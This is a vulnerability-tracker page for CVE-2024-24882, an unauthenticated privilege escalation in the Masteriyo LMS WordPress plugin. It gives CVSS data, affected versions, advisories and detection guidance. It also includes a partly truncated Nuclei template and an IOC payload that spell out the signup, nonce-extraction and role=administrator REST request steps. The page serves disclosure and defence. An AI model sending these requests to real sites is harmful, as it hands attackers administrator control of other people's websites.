CVE-2024-24882
published 2024-05-17CVE-2024-24882: Incorrect Privilege Assignment vulnerability in masteriyo Masteriyo - LMS learning-management-system.This issue affects Masteriyo - LMS: from n/a through <=…
PriorityP179critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
2.11%
79.5th percentile
Incorrect Privilege Assignment vulnerability in masteriyo Masteriyo - LMS learning-management-system.This issue affects Masteriyo - LMS: from n/a through <= 1.7.2.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| masteriyo | masteriyo_lms | <= 1.7.2 | — |
| themegrill | masteriyo | < 1.7.3 | 1.7.3 |
Detection & IOCsextracted from sources · hover to see the quote
url/account/signup/
url/wp-json/masteriyo/v1/users/me/?_locale=user
command{"first_name":"{{uname}}","last_name":"{{uname}}","email":"{{uname}}@gmail.com","role":"administrator","billing":{"state":"No state found"}}
other"roles":["administrator"]
- →Exploit registers a new user via /account/signup/ then sends a POST to /wp-json/masteriyo/v1/users/me/ with role=administrator to escalate privileges; detect unauthenticated or low-privilege REST API calls to this endpoint containing the 'role' field set to 'administrator'.
- →A successful exploitation returns HTTP 200 with Content-Type application/json and a body containing '"roles":["administrator"]'; monitor REST API responses for unexpected privilege escalation to administrator role.
- →The exploit uses the X-WP-Nonce header extracted from /account/ page to authenticate the privilege-escalation REST API request; monitor for REST API calls to masteriyo/v1/users/me with X-WP-Nonce from newly registered accounts.
- →The registration step uses the hidden field masteriyo-registration=yes; monitor POST requests to /account/signup/ containing this parameter as a precursor to the privilege escalation attempt.
- ·Vulnerability affects Masteriyo LMS plugin versions up to and including 1.7.2; ensure patched versions are not flagged. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-prmv-r26v-qgx9: Improper Privilege Management vulnerability in Masteriyo LMS allows Privilege Escalation
ghsa_unreviewed·2024-05-17
CVE-2024-24882 [CRITICAL] CWE-266 GHSA-prmv-r26v-qgx9: Improper Privilege Management vulnerability in Masteriyo LMS allows Privilege Escalation
Improper Privilege Management vulnerability in Masteriyo LMS allows Privilege Escalation.This issue affects LMS: from n/a through 1.7.2.
VulnCheck
Masteriyo - LMS Plugin Privilege Escalation
vulncheck·2024·CVSS 9.8
CVE-2024-24882 [CRITICAL] Masteriyo - LMS Plugin Privilege Escalation
Masteriyo - LMS Plugin Privilege Escalation
Improper Privilege Management vulnerability in Masteriyo LMS allows Privilege Escalation.This issue affects LMS: from n/a through 1.7.2.
Affected: Masteriyo Masteriyo LMS
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://patchstack.com/database/wordpress/plugin/learning-management-system/vulnerability/wordpress-lms-by-masteriyo-plugin-1-7-2-privilege-escalation-vulnerability
No detection rules found.
Nuclei
Masteriyo LMS <= 1.7.2 - Unauthenticated Privilege Escalation
nuclei·CVSS 9.8
CVE-2024-24882 [CRITICAL] Masteriyo LMS <= 1.7.2 - Unauthenticated Privilege Escalation
Masteriyo LMS ]*?value="([A-Za-z0-9]+)"'
internal: true
- raw:
- |
POST /account/signup/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
remember=true&first-name={{uname}}&last-name={{uname}}&username={{uname}}&email={{uname}}%40gmail.com&password=Test%40123&confirm-password=Test%40123&_wpnonce={{wpnonce}}&_wp_http_referer=%2Faccount%2Fsignup%2F&masteriyo-registration=yes
redirects: true
- raw:
- |
GET /account/ HTTP/1.1
Host: {{Hostname}}
redirects: true
extractors:
- type: regex
name: profile_nonce
part: body
group: 1
regex:
- '"nonce":"([a-zA-Z0-9]+)"'
internal: true
- raw:
- |
POST /wp-json/masteriyo/v1/users/me/?_locale=user HTTP/1.1
Host: {{Hostname}}
X-WP-Nonce: {{profile_nonce}}
Content-Type: application/json
{"first_name":"{{uname}}","last_name":
No writeups or analysis indexed.
https://patchstack.com/database/Wordpress/Plugin/learning-management-system/vulnerability/wordpress-lms-by-masteriyo-plugin-1-7-2-privilege-escalation-vulnerability?_s_id=cvehttps://patchstack.com/database/vulnerability/learning-management-system/wordpress-lms-by-masteriyo-plugin-1-7-2-privilege-escalation-vulnerability?_s_id=cve
2024-05-17
Published
Exploited in the wild